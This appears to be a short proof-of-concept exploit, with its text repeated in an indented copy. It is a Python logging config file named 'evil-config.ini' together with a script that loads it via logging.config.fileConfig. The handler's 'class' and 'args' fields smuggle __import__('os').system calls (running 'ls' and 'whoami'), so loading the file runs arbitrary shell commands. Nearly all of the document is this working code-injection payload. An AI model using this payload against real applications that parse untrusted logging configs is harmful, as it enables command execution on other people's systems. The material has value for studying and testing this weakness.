dhondta/evil-config.ini

## evil-config.ini
[loggers]
keys=root

[handlers]
keys=stream_handler

[formatters]
keys=formatter

[logger_root]
level=DEBUG
handlers=stream_handler

[handler_stream_handler]
class=__import__('os').system('ls') or StreamHandler
level=DEBUG
formatter=formatter
args=(__import__('os').system('whoami') or sys.stderr, )

[formatter_formatter]
format=%(name)-12s %(levelname)-8s %(message)s

## poc-python-logging.py
from logging.config import fileConfig

# trigger the vulnerability
fileConfig("evil-config.ini")
	[loggers]
	keys=root

	[handlers]
	keys=stream_handler

	[formatters]
	keys=formatter

	[logger_root]
	level=DEBUG
	handlers=stream_handler

	[handler_stream_handler]
	class=__import__('os').system('ls') or StreamHandler
	level=DEBUG
	formatter=formatter
	args=(__import__('os').system('whoami') or sys.stderr, )

	[formatter_formatter]
	format=%(name)-12s %(levelname)-8s %(message)s
	from logging.config import fileConfig

	# trigger the vulnerability
	fileConfig("evil-config.ini")